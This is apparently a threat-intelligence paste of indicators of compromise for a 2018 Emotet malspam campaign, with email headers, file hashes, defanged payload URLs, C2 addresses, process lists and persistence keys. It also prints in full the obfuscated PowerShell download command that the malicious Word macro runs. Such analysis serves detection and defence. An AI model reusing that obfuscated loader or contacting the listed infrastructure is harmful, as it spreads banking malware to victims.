API tools faq
paste
Advertisement
VRad

#emotet_091118

VRad
Nov 9th, 2018
1,333
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.37 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #Emotet #Banker #Feodo #W97M #Poweshell
  2.  
  3. https://pastebin.com/THHMs2wg
  4. other_Emotet_IOCs:
  5. https://pastebin.com/KVNyw9Uq
  6. https://pastebin.com/L2nSzNU4
  7. previous contact:
  8. https://pastebin.com/Y6DnbpHv
  9. FAQ:
  10. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
  11. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
  12.  
  13. attack_vector
  14. --------------
  15. email attach .doc > macro > powershell > GET > %temp%\*.exe
  16.  
  17. email_headers
  18. --------------
  19. Received: from public-swhrmf-2c.serverdata.net (public-swhrmf-2c.serverdata.net [64.78.61.27])
  20. Received: from public-swhrmf-2c.serverdata.net ([64.78.61.27])
  21. Received: from mail12.intermedia.net (unknown [64.78.61.134])
  22. Date: Fri, 09 Nov 2018 03:44:58 -0300
  23. From: Интернет-магазин С торгом <info@storgom.ua> <auxiliaradmon1@ravisa.com>
  24. To: user0@hq.88.victim.com
  25. Subject: Интернет-магазин С торгом: Order receipt #4553
  26.  
  27. files
  28. --------------
  29. SHA-256 af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8
  30. File name FILE-901171445210110.doc
  31. File size 71.13 KB
  32.  
  33. SHA-256 9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d
  34. File name extr
  35. File size 132 KB
  36.  
  37. SHA-256 db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050
  38. File name WCPDll
  39. File size 357.5 KB
  40.  
  41. activity
  42. **************
  43.  
  44. payload_src
  45. --------------
  46. h11p\мягкое-стекло{.} рф/OYRECjhJU 404
  47. h11p\sastudio{.} co/GgGV3mOVlN 200
  48. h11p\priscawrites{.} com/tS6M2ffhC 200
  49. h11p\gbsbrows{.} com/JZLqJd4 200
  50. h11p\evelin{.} ru/fgARtN6g 404
  51.  
  52. netwrk
  53. --------------
  54. 132.148.254.223 gbsbrows{.} com GET /JZLqJd4 HTTP/1.1 no User Agent
  55. 187.163.174.149 187.163.174.149:8080 GET / HTTP/1.1 Mozilla/4.0
  56.  
  57. comp
  58. --------------
  59. powershell.exe 2604 132.148.254.223 80 ESTABLISHED
  60. colorerkey.exe 2656 187.163.174.149 8080 ESTABLISHED
  61.  
  62. proc
  63. --------------
  64. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  65. C:\Windows\SysWOW64\CMD.exe CMD c:\wiNdoWS\SySTem32\CMd /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x') ...
  66. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ...
  67. "C:\tmp\862.exe"
  68. "C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe"
  69.  
  70. *obfuscated download command:
  71. --------------
  72. /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM([iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'NZDdasJAEIVfJRcLq1g3VEsoLgGLVlFaBaX2h95kk0l2NdlNk4lrG3z3JrbO5fnOHOYMqaLC12D7RuwhRGcFyF5BTFIFGjmZTn98KhHzkesmohSFsSULTeYuP56+ltHd+J9Za1kZlFhFyjTcnSfz3TBb79LV1XHS/WYARSJsJEUVD4PM06yV89tAuev3zeNkL5cv1wU4Qqo0Kyo3Th42uPKSK8kLVYaBLRTC3zG49Z4HcSwnlG3zVGGHjmmXk7do5vgOvfcGlJNoM/MJ6OMIIct79JP2Wt6jDE5AeWwKCELZIVhKR2mnLd6tsfiuSfMgNjVWpyaIZiqFi+fGaQO7fKGP5gD9RRN6Ubhocg78HAYYyvp8/gU=' ) , [sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct syStem.io.STreAmrEadEr( $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()}) && pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ) ( [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ; ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) ( \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri' ).Invoke( ( ( .('Gi' ) ( \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::( \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke( 'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss' ) ) ) )"
  73.  
  74. persist
  75. --------------
  76. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09.11.2018 14:52
  77. colorerkey Windows Componentization Platform Servicing API Microsoft Corporation
  78. c:\users\operator\appdata\local\microsoft\windows\colorerkey.exe 09.11.2018 14:45
  79.  
  80. drop
  81. --------------
  82. C:\tmp\862.exe
  83. C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe
  84.  
  85. # # #
  86. doc - https://www.virustotal.com/#/file/af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8/details
  87. exe - https://www.virustotal.com/#/file/9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d/details
  88. https://analyze.intezer.com/#/analyses/c028884b-15ca-4bda-abd0-a22d511fe240
  89. exe#2 - https://www.virustotal.com/#/file/db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050/details
  90. https://analyze.intezer.com/#/analyses/01b66204-33f5-4128-8f0f-11db305a3101
  91. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!